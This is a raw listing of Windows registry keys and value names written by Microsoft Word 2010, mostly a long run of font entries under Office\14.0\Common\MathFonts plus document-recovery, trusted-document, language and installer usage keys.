HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
q.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
&s.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2AC56
2AC56
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\35300
35300
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
